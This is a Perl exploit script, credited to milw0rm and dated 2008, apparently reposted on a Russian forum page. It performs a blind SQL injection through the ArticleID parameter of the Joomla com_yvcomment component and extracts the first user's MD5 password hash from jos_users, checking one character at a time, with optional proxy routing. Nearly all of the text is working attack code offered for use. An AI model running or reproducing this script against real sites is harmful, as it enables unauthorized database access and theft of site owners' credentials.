my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"a"})
{
  $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $aid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $aid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $aid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "DateAndAuthor";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-08]


Время: 15:31
Страница 2 из 10 < 1 2 3 4 5 6 > Последняя »
Показывать 40 сообщений этой темы на одной странице